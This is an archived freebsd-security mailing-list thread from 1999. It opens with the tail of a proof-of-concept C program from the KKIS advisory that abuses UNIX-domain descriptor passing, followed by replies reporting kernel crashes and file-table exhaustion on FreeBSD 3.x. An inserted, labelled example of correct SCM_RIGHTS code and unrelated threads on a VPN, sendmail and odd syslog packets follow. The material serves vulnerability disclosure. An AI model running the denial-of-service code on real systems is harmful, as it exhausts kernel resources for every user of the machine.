	if (bind(sockfd, (struct sockaddr *) &addr_c, addr_c.sun_len) == -1)
		printf("bind error %d\n", errno);

	/* Ask the server for a descriptor, then receive it. */
	if (sendto(sockfd, &data, sizeof(data), 0, (struct sockaddr *) &addr_s,
		addr_s.sun_len) == -1)
		printf("sendto error %d\n", errno);

	len = addr_s.sun_len;

	ancdbuf.hdr.cmsg_len = sizeof(ancdbuf);
	ancdbuf.hdr.cmsg_level = SOL_SOCKET;
	ancdbuf.hdr.cmsg_type = SCM_RIGHTS;

	mymsghdr.msg_name = NULL;
	mymsghdr.msg_namelen = 0;
	mymsghdr.msg_iov = NULL;
	mymsghdr.msg_iovlen = 0;
	mymsghdr.msg_control = (caddr_t) &ancdbuf;
	mymsghdr.msg_controllen = ancdbuf.hdr.cmsg_len;
	mymsghdr.msg_flags = 0;

	if (recvmsg(sockfd, &mymsghdr, 0) == -1)
		printf("recvmsg error %d\n", errno);

	fd = ancdbuf.fd;

	close(fd);
	close(sockfd);
}
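The attached example.c hand-builds its SCM_RIGHTS control message and never checks what recvmsg() actually delivered, so a descriptor the receiver did not expect is simply lost in that process. What follows is an added example, not code from the advisory or from anyone in this thread: the same descriptor pass written with the CMSG_* macros and a receive side that validates the control data and closes anything it does not hand back. It assumes a POSIX system with socketpair(2) and AF_UNIX/SOCK_DGRAM sockets; the pipe it passes is a constructed stand-in for the advisory's open("/etc/passwd").

```c
/* Added example (not the advisory's example.c): SCM_RIGHTS over an AF_UNIX
 * SOCK_DGRAM socketpair with CMSG_* macros and leak-free receive handling.
 * Assumes a POSIX system with socketpair(2); the pipe is a constructed stand-in. */
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <unistd.h>

/* Ancillary buffer sized and aligned for exactly one descriptor. */
union fd_cmsg {
    struct cmsghdr hdr;
    char buf[CMSG_SPACE(sizeof(int))];
};

/* Point msg at a one-byte iovec and at the ancillary buffer. */
static void init_msg(struct msghdr *msg, struct iovec *iov, union fd_cmsg *ctl)
{
    memset(msg, 0, sizeof *msg);
    memset(ctl, 0, sizeof *ctl);
    msg->msg_iov = iov;
    msg->msg_iovlen = 1;
    msg->msg_control = ctl->buf;
    msg->msg_controllen = sizeof ctl->buf;
}

/* Send one descriptor with a one-byte payload (ancillary data needs a
 * datagram to ride on). Returns 0 on success, -1 on error. */
static int send_fd(int sock, int fd)
{
    char data = 'F';
    struct iovec iov = { .iov_base = &data, .iov_len = 1 };
    union fd_cmsg ctl;
    struct msghdr msg;
    struct cmsghdr *cm;
    init_msg(&msg, &iov, &ctl);
    cm = CMSG_FIRSTHDR(&msg);
    cm->cmsg_level = SOL_SOCKET;
    cm->cmsg_type = SCM_RIGHTS;
    cm->cmsg_len = CMSG_LEN(sizeof(int));
    memcpy(CMSG_DATA(cm), &fd, sizeof(int));
    return sendmsg(sock, &msg, 0) == 1 ? 0 : -1;
}

/* Receive one descriptor. Returns it, or -1 if the datagram carried none or
 * the control data was truncated (MSG_CTRUNC). Every descriptor the kernel
 * installed that is not returned is closed here rather than leaked. */
static int recv_fd(int sock)
{
    char data;
    struct iovec iov = { .iov_base = &data, .iov_len = 1 };
    union fd_cmsg ctl;
    struct msghdr msg;
    struct cmsghdr *cm;
    int fd = -1, truncated;
    init_msg(&msg, &iov, &ctl);
    if (recvmsg(sock, &msg, 0) < 0)
        return -1;
    truncated = (msg.msg_flags & MSG_CTRUNC) != 0;
    for (cm = CMSG_FIRSTHDR(&msg); cm != NULL; cm = CMSG_NXTHDR(&msg, cm)) {
        if (cm->cmsg_level != SOL_SOCKET || cm->cmsg_type != SCM_RIGHTS)
            continue;
        size_t n = (cm->cmsg_len - CMSG_LEN(0)) / sizeof(int);
        int *fds = (int *)CMSG_DATA(cm);
        for (size_t i = 0; i < n; i++) {
            if (fd == -1 && !truncated)
                fd = fds[i];       /* keep the first descriptor */
            else
                close(fds[i]);     /* extra or truncated: close, never leak */
        }
    }
    return fd;
}

/* Round trip: pass the read end of a pipe across a socketpair and read the
 * pipe's contents through the received copy. Returns 0 on success. */
int fd_roundtrip(void)
{
    int sv[2], pfd[2], rfd, rc = -1;
    char buf[8] = { 0 };
    if (socketpair(AF_UNIX, SOCK_DGRAM, 0, sv) < 0)
        return -1;
    if (pipe(pfd) < 0) {
        close(sv[0]); close(sv[1]);
        return -1;
    }
    if (write(pfd[1], "hello", 5) == 5 && send_fd(sv[0], pfd[0]) == 0 &&
        (rfd = recv_fd(sv[1])) >= 0) {
        if (read(rfd, buf, sizeof buf - 1) == 5 && strcmp(buf, "hello") == 0)
            rc = 0;
        close(rfd);                /* the received copy is a new descriptor */
    }
    close(pfd[0]); close(pfd[1]);
    close(sv[0]); close(sv[1]);
    return rc;
}

int main(void)
{
    int rc = fd_roundtrip();
    printf("SCM_RIGHTS round trip: %s\n", rc == 0 ? "ok" : "failed");
    return rc == 0 ? 0 : 1;
}
```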
From owner-freebsd-security Thu May  6 13:10:52 1999
From: Wojtek
Date: Thu, 6 May 1999 22:11:35 +0000 (GMT)
To: freebsd-security@freebsd.org
Subject: KKIS.05051999.003b (fwd)

have a look at this.

---------- Forwarded message ----------
Date: Wed, 5 May 1999 11:26:21 +0200
From: Lukasz Luzar
To: BUGTRAQ@NETSPACE.ORG
Subject: KKIS.05051999.003b

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

      ###  ###  ###  ###  ###
      ###  ###  ###  ###  ###
      ######    ######    ###
      ###  ###  ###  ###  ###
      ###  ###  ###  ###  ###

                            S E C U R I T Y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Contacts ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      KKI Security Team                   Cracow Commercial Internet
      http://www.security.kki.pl          http://www.kki.pl
      mailto:security@security.kki.pl     mailto:biuro@kki.pl

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Information ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
   Report title      : Security problem with sockets in FreeBSD's
                       implementation of UNIX-domain protocol family.
   Problem found by  : Lukasz Luzar (lluzar@security.kki.pl)
   Report created by : Robert Pajak (shadow@security.kki.pl)
                       Lukasz Luzar (lluzar@security.kki.pl)
   Report published  : 5th May 1999
   Report code       : KKIS.05051999.003.b
   Systems affected  : FreeBSD-3.0 and maybe 3.1
   Archive           : http://www.security.kki.pl/advisories/
   Risk level        : high

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Description ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
   As you know, "The UNIX-domain protocol family is a collection of protocols
   that provides local interprocess communication through the normal socket
   mechanism. It supports the SOCK_STREAM and SOCK_DGRAM socket types and uses
   filesystem pathnames for addressing."
   The SOCK_STREAM sockets also support the communication of UNIX file
   descriptors through the use of the functions sendmsg() and recvmsg().
   While testing UNIX-domain protocols, we have found a probable bug in
   FreeBSD's implementation of this mechanism.
   When we ran the attached example on FreeBSD-3.0 as a local user, the
   system crashed immediately with the error "Supervisor read, page not
   present" in kernel mode.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Example ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
   Look at the attached example.

~~~~~~~~~~~~~~~~~~~~~~~~~~[ Copyright statement ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
   Copyright (c) 1999 KKI Security Team, Poland
   All rights reserved.
   All questions please address to mailto:security@security.kki.pl
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Content-Type: TEXT/PLAIN; CHARSET=US-ASCII; NAME="example.c"
Content-Transfer-Encoding: BASE64
Content-Disposition: ATTACHMENT; FILENAME="example.c"

From owner-freebsd-security Thu May  6 14:16:47 1999
From: James Snow
Date: Thu, 6 May 1999 17:16:38 -0400 (EDT)
To: Wojtek
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: KKIS.05051999.003b (fwd)

On Thu, 6 May 1999, Wojtek wrote:
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Description ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>    As you know, "The UNIX-domain protocol family is a collection of protocols
>    that provides local interprocess communication through the normal socket
>    mechanism. It supports the SOCK_STREAM and SOCK_DGRAM socket types and uses
>    filesystem pathnames for addressing."
>    The SOCK_STREAM sockets also support the communication of UNIX file
>    descriptors through the use of the functions sendmsg() and recvmsg().
>    While testing UNIX-domain protocols, we have found a probable bug in
>    FreeBSD's implementation of this mechanism.
>    When we ran the attached example on FreeBSD-3.0 as a local user, the
>    system crashed immediately with the error "Supervisor read, page not
>    present" in kernel mode.

FWIW, I'm running this on a 3.1-R box as we speak, and am using said box to
ssh to this box and write this message. Other than causing the following
problem:

ls: .: Too many open files in system

it doesn't appear to be doing anything to me. So, 3.1 is in the clear, it
seems.

-sno

o - - - - - - - - - - - - - o - - - - - - - - - - - - o
| We live in the short term | sno at teardrop dot org |
| and hope for the best.    | I am Geek. Hear me ^G   |
o - - - - - - - - - - - - - o - - - - - - - - - - - - o

From owner-freebsd-security Thu May  6 16:10:41 1999
From: Wes Peters
Organization: Softweyr LLC
Date: Thu, 06 May 1999 17:09:57 -0600
To: sthaug@nethelp.no
Cc: security@FreeBSD.ORG
Subject: Re: Forward: KKIS.05051999.003b
Message-Id: <37322145.73D7B836@softweyr.com>
References: <13867.926015880@verdi.nethelp.no>

> Just saw this on Bugtraq. Unable to reproduce it on 3.1-STABLE from
> 14. april.

On my 3.1-RELEASE system it reports numerous sendmsg ECONNREFUSED and
ENOENTs, then eventually dives into repeats of:

unlink error 2
bind error 9
sento error 9
recvmsg error 9
socket error 23

Right now it's reporting "too many open files in system" when I try to do
much of anything.

-- 
"Where am I, and what am I doing in this handbasket?"
Wes Peters                                                 Softweyr LLC
http://www.softweyr.com/~softweyr                      wes@softweyr.com

From owner-freebsd-security Thu May 6 16:40:41 1999
Delivered-To: freebsd-security@freebsd.org
Received: from squirrel.tgsoft.com (cx20270-a.pwy1.sdca.home.com [24.0.169.3]) by hub.freebsd.org (Postfix) with SMTP id 6C7A31515A for ; Thu, 6 May 1999 16:40:31 -0700 (PDT) (envelope-from thompson@squirrel.tgsoft.com)
Received: (qmail 11431 invoked by uid 128); 6 May 1999 23:40:30 -0000
Date: 6 May 1999 23:40:30 -0000
Message-ID: <19990506234030.11430.qmail@squirrel.tgsoft.com>
From: mark thompson
To: pb@fasterix.freenix.org
Cc: freebsd-security@freebsd.org
Subject: tunip: a quick review (was: VPN)
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Fri, 30 Apr 1999 23:30:59 +0200 Pierre Beyssac was overheard saying:
> BTW, as there seems to be a lot of interest in VPNs currently, and I had a
> need for something that could run between my FreeBSD box and a Linux box,
> I've written a small usermode IPSEC-compliant tunnel when I became tired of
> the impressive number of non-compatible hacks based on PPP, ssh, TCP, PPTP,
> you name it, while IPSEC clearly will sweep all of this.
>
> It's more of a proof-of-concept code for the moment (only fixed keys: it
> lacks key negotiation stuff), and it can't beat a kernel implementation for
> performance, but it's easier to install, easier to port to other systems
> (you only need some kind of a "tun" device), easier to debug, easier to add
> weird crypto algorithms, easier to export (the crypto is from the OpenSSL
> library), and last but not least easier to distribute as a package external
> to the core OS.
>
> I'm happily running it between several FreeBSD and Linux boxes to set up
> tunnels to friends through my cable modem. If anyone is interested, it can
> be found here.
>
> WARNING: it's really experimental and the documentation is lacking, don't
> even bother if you don't know how to set up a point-to-point link or how to
> add the tun device to your kernel.
>
> http://www.enst.fr/~beyssac/tunip.tar.gz

I have tried several different IPSec packages. Mostly, they just made my
machine unstable. This one is *simple* and *effective*. It worked for me out
of the box (FreeBSD 2.7 and 3.1). I suggest making a port of it...

Despite the disclaimers above about limited function, the only real problem
in terms of setting it up and using it day-to-day is an acute lack of
documentation.

Try it!

-mark
--
"The American people will never knowingly adopt Socialism, but under the name
of Liberalism, they will adopt every fragment of the Socialist program until
one day America will be a Socialist nation without knowing how it happened"
        Norman Thomas - Socialist Party Presidential candidate

-mark

From owner-freebsd-security Thu May 6 17:16:53 1999
Delivered-To: freebsd-security@freebsd.org
Received: from shell.monmouth.com (shell.monmouth.com [205.231.236.9]) by hub.freebsd.org (Postfix) with ESMTP id 0C44614BF4 for ; Thu, 6 May 1999 17:16:51 -0700 (PDT) (envelope-from tbocchino@monmouth.com)
Received: from tyan (bg-tc-ppp323.monmouth.com [209.191.61.70]) by shell.monmouth.com (8.9.0/8.9.0) with SMTP id UAA25907 for ; Thu, 6 May 1999 20:16:25 -0400 (EDT)
Message-ID: <001701be981f$08efe460$0400a8c0@tyan.bcs>
From: "Tom Bocchino"
To:
Subject: auth 22f8262a unsubscribe freebsd-security tbocchino@monmouth.com
Date: Thu, 6 May 1999 20:17:46 -0400
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="----=_NextPart_000_0014_01BE97FD.8182B6E0"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 4.72.3155.0
X-MimeOLE: Produced By Microsoft MimeOLE V4.72.3155.0
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

auth 22f8262a unsubscribe freebsd-security tbocchino@monmouth.com
From owner-freebsd-security Fri May 7 5:21: 4 1999
Delivered-To: freebsd-security@freebsd.org
Received: from silver.teardrop.net (silver.teardrop.net [216.155.28.66]) by hub.freebsd.org (Postfix) with ESMTP id 11B2114C29 for ; Fri, 7 May 1999 05:21:01 -0700 (PDT) (envelope-from sno@teardrop.org)
Received: from localhost (sno@localhost) by silver.teardrop.net (8.9.2/8.9.2) with SMTP id IAA95603; Fri, 7 May 1999 08:20:43 -0400 (EDT) (envelope-from sno@teardrop.org)
Date: Fri, 7 May 1999 08:20:42 -0400 (EDT)
From: James Snow
X-Sender: sno@silver.teardrop.net
To: Wes Peters
Cc: sthaug@nethelp.no, security@FreeBSD.ORG
Subject: Re: Forward: KKIS.05051999.003b
In-Reply-To: <37322145.73D7B836@softweyr.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Thu, 6 May 1999, Wes Peters wrote:
> Right now it's reporting "too many open files in system" when I try to
> do much of anything.

Seems that I spoke too soon with my previous post. My machine never
recovered from having 'too many open files in system.' I had thought that
it would because just the other day I had another 3.1-R box recover from
this without trouble. But, 12 hours later, this one still hasn't. (The
first box did not have this program run on it.)

I don't know enough about the kernel to have a clue here.

-sno

o - - - - - - - - - - - - - o - - - - - - - - - - - - o
| We live in the short term | sno at teardrop dot org |
| and hope for the best.    | I am Geek. Hear me ^G   |
o - - - - - - - - - - - - - o - - - - - - - - - - - - o

From owner-freebsd-security Fri May 7 13:39:15 1999
Delivered-To: freebsd-security@freebsd.org
Received: from unix.aecinfo.com (unix.aecinfo.com [209.146.217.236]) by hub.freebsd.org (Postfix) with ESMTP id B0C4015197; Fri, 7 May 1999 13:38:56 -0700 (PDT) (envelope-from mitayai@aecinfo.com)
Received: from p09 (tor-239.on.ca.aecinfo.com [209.146.217.239]) by unix.aecinfo.com (8.8.8/8.8.8) with SMTP id QAA03003; Fri, 7 May 1999 16:38:51 -0400 (EDT) (envelope-from mitayai@aecinfo.com)
Message-ID: <02fd01be98c9$9fc3a480$efd992d1@p09.aecinfo.com>
Reply-To: "Will Mitayai Keeso Rowe"
From: "Will Mitayai Keeso Rowe"
To: ,
Cc: "Matt Scollard"
Subject: Sendmail 8.8.8 probs.
Date: Fri, 7 May 1999 16:38:52 -0400
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 4.72.3110.5
X-MimeOLE: Produced By Microsoft MimeOLE V4.72.3110.3
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

According to sendmail.org, there are a number of security problems with
sendmail 8.8.8. Are there any plans to update 2.2-STABLE's sendmail?
---
Will Mitayai Keeso Rowe
Director of Internet Technology
AEC InfoCenter, Inc
Suite 200, 25 Imperial Street / Toronto, Ontario / M5P 1B9 / Canada
Phone: +1(416)489-9000 Fax: +1(416)489-3201
Email: mitayai@aecinfo.com Web: http://www.aecinfo.com

From owner-freebsd-security Fri May 7 14: 6:21 1999
Delivered-To: freebsd-security@freebsd.org
Received: from mail-gw2adm.rcsntx.swbell.net (mail-gw2.rcsntx.swbell.net [151.164.30.52]) by hub.freebsd.org (Postfix) with ESMTP id 8B9F814C05; Fri, 7 May 1999 14:06:10 -0700 (PDT) (envelope-from chris@holly.dyndns.org)
Received: from holly.dyndns.org (ppp-207-193-13-65.hstntx.swbell.net [207.193.13.65]) by mail-gw2adm.rcsntx.swbell.net (8.8.5/8.8.5) with ESMTP id QAA06698; Fri, 7 May 1999 16:05:54 -0500 (CDT)
Received: (from chris@localhost) by holly.dyndns.org (8.9.3/8.9.3) id QAA03001; Fri, 7 May 1999 16:07:11 -0500 (CDT) (envelope-from chris)
Date: Fri, 7 May 1999 16:07:10 -0500
From: Chris Costello
To: Will Mitayai Keeso Rowe
Cc: stable@FreeBSD.ORG, security@FreeBSD.ORG, Matt Scollard
Subject: Re: Sendmail 8.8.8 probs.
Message-ID: <19990507160709.K1526@holly.dyndns.org>
Reply-To: chris@calldei.com
References: <02fd01be98c9$9fc3a480$efd992d1@p09.aecinfo.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
User-Agent: Mutt/0.96.1i
In-Reply-To: <02fd01be98c9$9fc3a480$efd992d1@p09.aecinfo.com>; from Will Mitayai Keeso Rowe on Fri, May 07, 1999 at 04:38:52PM -0400
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Fri, May 7, 1999, Will Mitayai Keeso Rowe wrote:
> According to sendmail.org, there are a number of security problems with sendmail 8.8.8. Are there
> any plans to update 2.2-STABLE's sendmail?
   You can always download Sendmail 8.9.3 from sendmail.org, or if you're
feeling lucky, migrate to 3.1-STABLE (or wait for 3.2)

> ---
> Will Mitayai Keeso Rowe
> Director of Internet Technology
> AEC InfoCenter, Inc
> Suite 200, 25 Imperial Street / Toronto, Ontario / M5P 1B9 / Canada
> Phone: +1(416)489-9000 Fax: +1(416)489-3201
> Email: mitayai@aecinfo.com Web: http://www.aecinfo.com
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-stable" in the body of the message

--
Chris Costello
Don't stop at one bug.

From owner-freebsd-security Fri May 7 14:50:24 1999
Delivered-To: freebsd-security@freebsd.org
Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (Postfix) with ESMTP id 98CC6153A3; Fri, 7 May 1999 14:50:13 -0700 (PDT) (envelope-from brett@lariat.org)
Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.lariat.org [206.100.185.2]) by lariat.lariat.org (8.9.3/8.9.3) with ESMTP id PAA17911; Fri, 7 May 1999 15:49:48 -0600 (MDT)
Message-Id: <4.2.0.37.19990507154839.044cff00@localhost>
X-Sender: brett@localhost
X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.37 (Beta)
Date: Fri, 07 May 1999 15:49:41 -0600
To: chris@calldei.com, Will Mitayai Keeso Rowe
From: Brett Glass
Subject: Re: Sendmail 8.8.8 probs.
Cc: stable@FreeBSD.ORG, security@FreeBSD.ORG, Matt Scollard
In-Reply-To: <19990507160709.K1526@holly.dyndns.org>
References: <02fd01be98c9$9fc3a480$efd992d1@p09.aecinfo.com> <02fd01be98c9$9fc3a480$efd992d1@p09.aecinfo.com>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

2.2.8 is less than half a year old. It ought to be supported.
--Brett

At 04:07 PM 5/7/99 -0500, Chris Costello wrote:
>On Fri, May 7, 1999, Will Mitayai Keeso Rowe wrote:
> > According to sendmail.org, there are a number of security problems with sendmail 8.8.8. Are there
> > any plans to update 2.2-STABLE's sendmail?
>
> You can always download Sendmail 8.9.3 from sendmail.org, or
>if you're feeling lucky, migrate to 3.1-STABLE (or wait for 3.2)
>
> > ---
> > Will Mitayai Keeso Rowe
> > Director of Internet Technology
> > AEC InfoCenter, Inc
> > Suite 200, 25 Imperial Street / Toronto, Ontario / M5P 1B9 / Canada
> > Phone: +1(416)489-9000 Fax: +1(416)489-3201
> > Email: mitayai@aecinfo.com Web: http://www.aecinfo.com
> >
> > To Unsubscribe: send mail to majordomo@FreeBSD.org
> > with "unsubscribe freebsd-stable" in the body of the message
>
>--
>Chris Costello
>Don't stop at one bug.
>
>To Unsubscribe: send mail to majordomo@FreeBSD.org
>with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Fri May 7 15: 3:40 1999
Delivered-To: freebsd-security@freebsd.org
Received: from guru.phone.net (guru.phone.net [209.157.82.120]) by hub.freebsd.org (Postfix) with SMTP id 68B52153B2 for ; Fri, 7 May 1999 15:03:31 -0700 (PDT) (envelope-from mwm@phone.net)
Received: (qmail 48034 invoked by uid 100); 7 May 1999 22:03:30 -0000
Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 7 May 1999 22:03:30 -0000
Date: Fri, 7 May 1999 15:03:30 -0700 (PDT)
From: Mike Meyer
To: stable@FreeBSD.ORG
Cc: security@FreeBSD.ORG
Subject: Re: Sendmail 8.8.8 probs.
In-Reply-To: <4.2.0.37.19990507154839.044cff00@localhost>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

I didn't think the FreeBSD team supported downrev releases that way.
Software fixes - either patches, or new versions of bundled software or
ports - showed up in the next release. Since development on 2.2.8 has
officially stopped, you don't get new releases - so you don't get that kind
of update.

On the other hand, if downloading and installing 8.9.3 is more than you can
handle, I'll be glad to provide a support contract at prices comparable to
Suns :-).

> Date: Fri, 07 May 1999 15:49:41 -0600
> From: Brett Glass
> To: chris@calldei.com, Will Mitayai Keeso Rowe
> Cc: stable@FreeBSD.ORG, security@FreeBSD.ORG, Matt Scollard
> Subject: Re: Sendmail 8.8.8 probs.
>
> 2.2.8 is less than half a year old. It ought to be supported.
>
> --Brett
>
> At 04:07 PM 5/7/99 -0500, Chris Costello wrote:
> >On Fri, May 7, 1999, Will Mitayai Keeso Rowe wrote:
> > > According to sendmail.org, there are a number of security problems with sendmail 8.8.8. Are there
> > > any plans to update 2.2-STABLE's sendmail?
> >
> > You can always download Sendmail 8.9.3 from sendmail.org, or
> >if you're feeling lucky, migrate to 3.1-STABLE (or wait for 3.2)
> >
> > > ---
> > > Will Mitayai Keeso Rowe
> > > Director of Internet Technology
> > > AEC InfoCenter, Inc
> > > Suite 200, 25 Imperial Street / Toronto, Ontario / M5P 1B9 / Canada
> > > Phone: +1(416)489-9000 Fax: +1(416)489-3201
> > > Email: mitayai@aecinfo.com Web: http://www.aecinfo.com
> > >
> > > To Unsubscribe: send mail to majordomo@FreeBSD.org
> > > with "unsubscribe freebsd-stable" in the body of the message
> >
> >--
> >Chris Costello
> >Don't stop at one bug.
> >
> >To Unsubscribe: send mail to majordomo@FreeBSD.org
> >with "unsubscribe freebsd-security" in the body of the message
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-stable" in the body of the message

From owner-freebsd-security Fri May 7 15:54:55 1999
Delivered-To: freebsd-security@freebsd.org
Received: from frmug.org (frmug-gw.frmug.org [193.56.58.252]) by hub.freebsd.org (Postfix) with ESMTP id 920D614DED for ; Fri, 7 May 1999 15:54:46 -0700 (PDT) (envelope-from roberto@keltia.freenix.fr)
Received: (from uucp@localhost) by frmug.org (8.9.1/frmug-2.3/nospam) with UUCP id AAA19852 for security@freebsd.org; Sat, 8 May 1999 00:54:44 +0200 (CEST) (envelope-from roberto@keltia.freenix.fr)
Received: by keltia.freenix.fr (Postfix, from userid 101) id 498BC884A; Fri, 7 May 1999 23:34:22 +0200 (CEST) (envelope-from roberto)
Date: Fri, 7 May 1999 23:34:22 +0200
From: Ollivier Robert
To: security@freebsd.org
Subject: Re: Sendmail 8.8.8 probs.
Message-ID: <19990507233422.A60879@keltia.freenix.fr>
Mail-Followup-To: security@freebsd.org
References: <02fd01be98c9$9fc3a480$efd992d1@p09.aecinfo.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
User-Agent: Mutt/0.95.5i
In-Reply-To: <02fd01be98c9$9fc3a480$efd992d1@p09.aecinfo.com>; from Will Mitayai Keeso Rowe on Fri, May 07, 1999 at 04:38:52PM -0400
X-Operating-System: FreeBSD 4.0-CURRENT/ELF ctm#5307 AMD-K6 MMX @ 200 MHz
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

According to Will Mitayai Keeso Rowe:
> According to sendmail.org, there are a number of security problems with sendmail 8.8.8. Are there
> any plans to update 2.2-STABLE's sendmail?

Do yourself a favor and install Postfix instead. It is in ports.

--
Ollivier ROBERT -=- FreeBSD: The Power to Serve!
-=- roberto@keltia.freenix.fr
FreeBSD keltia.freenix.fr 4.0-CURRENT #2: Fri Apr 16 22:37:03 CEST 1999

From owner-freebsd-security Fri May 7 16:59:55 1999
Delivered-To: freebsd-security@freebsd.org
Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id C952314C9B for ; Fri, 7 May 1999 16:59:52 -0700 (PDT) (envelope-from robert@cyrus.watson.org)
Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.8.8/8.8.8) with SMTP id TAA10952 for ; Fri, 7 May 1999 19:59:51 -0400 (EDT) (envelope-from robert@cyrus.watson.org)
Date: Fri, 7 May 1999 19:59:51 -0400 (EDT)
From: Robert Watson
X-Sender: robert@fledge.watson.org
Reply-To: Robert Watson
To: security@freebsd.org
Subject: Unusual syslog packets, crashing named...
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

This afternoon I logged some unusual packets from cp-pm4.glas.apc.org coming
into the syslog port on two of my hosts (one BSD/OS, the other FreeBSD).
Since I am not in the habit of accepting [syslog] packets from strangers, I
tcpdump'd them. I've attached syslogd getting upset, a copy of two packets in
hex form, and the useful text from the packet below that. I don't know if
this is a port scan, or what it is, but sending ports to other people's hosts
using syslog is not very polite. Any takers on what this is exactly?
May 7 17:39:03 fledge syslogd: discarded 1 unwanted packets in secure mode
May 7 17:39:20 fledge syslogd: discarded 2 unwanted packets in secure mode
May 7 17:40:10 fledge syslogd: discarded 4 unwanted packets in secure mode
May 7 17:43:37 fledge syslogd: discarded 8 unwanted packets in secure mode

17:40:21.740443 cp-pm4.glas.apc.org.1023 > www.modarchive.com.syslog: udp 96
        4500 007c 1aae 0000 f411 1128 c17c 05c1
        cf56 0407 03ff 0202 0068 752f 3c31 343e
        4368 6f69 6365 4e65 7420 426c 6f63 6b20
        3139 352e 3231 382e 3235 312e 3520 2d20
        3030 2035 3020 3034 2037 6120 3566 2062
        6420 6435 2030 6120 3030 2030 6620 6537
        2035 6320 3530 2031 3120 3232 2033 3820
        6461 2035 6620 3030 2030 3020

17:40:10.980831 cp-pm4.glas.apc.org.1023 > fledge.watson.org.syslog: udp 108
        4500 0088 1a37 0000 ee11 1222 c17c 05c1
        cc9c 0c32 03ff 0202 0074 1f36 3c31 343e
        4368 6f69 6365 4e65 7420 426c 6f63 6b20
        3139 352e 3231 382e 3235 312e 3520 2d20
        3030 2035 3020 3034 2037 3820 3330 2038
        6320 3865 2031 6320 3030 2030 6620 6362
        2037 6520 3630 2031 3220 3434 2037 3020
        3263 2066 3920 3030 2030 3020 3032 2030
        3420 3035 2062 3420

Useful text extracted:

(some headers) followed by
<14>ChoiceNet Block 195.218.251.5 - 00 50 04 7b 30 c6 12 78 00 10 0c ed 60 12 44 70 66 f1 00 00 02 04 05 b4

Unfortunately, I don't have an IP for the host in question, as I didn't log
that (that is just stdout from tcpdump, because the packets stopped shortly
afterwards).

Also, this morning, I observed a coredump of named on another of my hosts.
Both of these hosts are running 2.2-stable at the end of the 2.2 branch
lifetime. I'm a little concerned. Are there any known issues with the
version of named last shipped with 2.2-stable (4.9.7-T1B)? Anyone know what
these syslog packets might mean? (the content is a little weird).
May 7 08:42:37 cyrus /kernel: pid 106 (named), uid 0: exited on signal 11

Robert N Watson
robert@fledge.watson.org              http://www.watson.org/~robert/
PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1
Carnegie Mellon University            http://www.cmu.edu/
TIS Labs at Network Associates, Inc.  http://www.tis.com/
Safeport Network Services             http://www.safeport.com/

From owner-freebsd-security Fri May 7 17:21:48 1999
Delivered-To: freebsd-security@freebsd.org
Received: from gatekeeper.tsc.tdk.com (gatekeeper.tsc.tdk.com [207.113.159.21]) by hub.freebsd.org (Postfix) with ESMTP id C87D714EAE for ; Fri, 7 May 1999 17:21:40 -0700 (PDT) (envelope-from gdonl@tsc.tdk.com)
